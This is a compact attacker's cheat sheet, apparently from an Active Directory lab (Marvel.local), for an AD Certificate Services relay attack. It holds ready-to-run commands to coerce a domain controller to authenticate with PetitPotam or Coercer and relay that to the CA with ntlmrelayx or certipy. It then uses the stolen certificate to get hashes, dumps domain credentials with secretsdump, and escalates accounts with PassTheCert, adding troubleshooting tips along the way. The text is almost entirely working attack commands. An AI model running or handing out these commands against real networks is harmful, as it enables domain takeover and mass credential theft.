Do the check:
certipy find -username fcastle@Marvel.local -password Password1 -dc-ip 192.168.218.136 -stdout -debug -scheme ldapHost on NTLMRelayx:
sudo impacket-ntlmrelayx -t "http://CA01.domain.com/certsrv/certfnsh.asp" --adcs -smb2support --template DomainControllerHost certipy relay (preferred):
sudo certipy relay -target 'http://CA01.domain.com' -template DomainController -debug-t is CA DNS/FQDN
if you’re gonna coerce the DC to authenticate to you, you need -template DomainController
Coercer (to coerce the DC into authenticating to your hosted certipy/NTLMrelayx server):
/root/.local/bin/coercer coerce -t dc.ip.goes.here -u 'User' -p 'Password' -d domain.com -l kali.machine.ip.hereSometimes, Coercer will return an error about getting back 2 values, but other coercion methods will work (try PetitPotam if that happens).
PetitPotam:
python3 PetitPotam.py -u 'user' -p 'password' -d domain.com kali.ip.goes.here dc.ip.goes.hereUse the retrieved cert:
certipy auth -pfx machineAccount.pfx -dc-ip 192.168.218.136 -username machineAccount -domain Marvel.localThe most realistic thing you would do here is a secretsdump using the hash you get from the previous command.
User NTLM:
secretsdump.py administrator:@192.168.218.139 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04fMachine (like DC01$):
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
secretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'secretsdump.py -hashes :e52cac67419a9a224a3b108f3fa6cb6d -just-dc-ntlm 'MARVEL/dc01$@dc01.marvel.local'PassTheCert:
Create crt and key from pfx:
certipy cert -pfx "PATH_TO_PFX_CERT" -nokey -out "user.crt"certipy cert -pfx "PATH_TO_PFX_CERT" -nocert -out "user.key"Pass:
passthecert.py -action modify_user -crt "PATH_TO_CRT" -key "PATH_TO_KEY" -domain "domain.local" -dc-ip "DC_IP" -target "SAM_ACCOUNT_NAME" -elevateIf you encounter a 403 or a 404 in the relay, it likely means that the HTTP version of the CA webpage is enabled, but HTTPS is the one that’s actually used.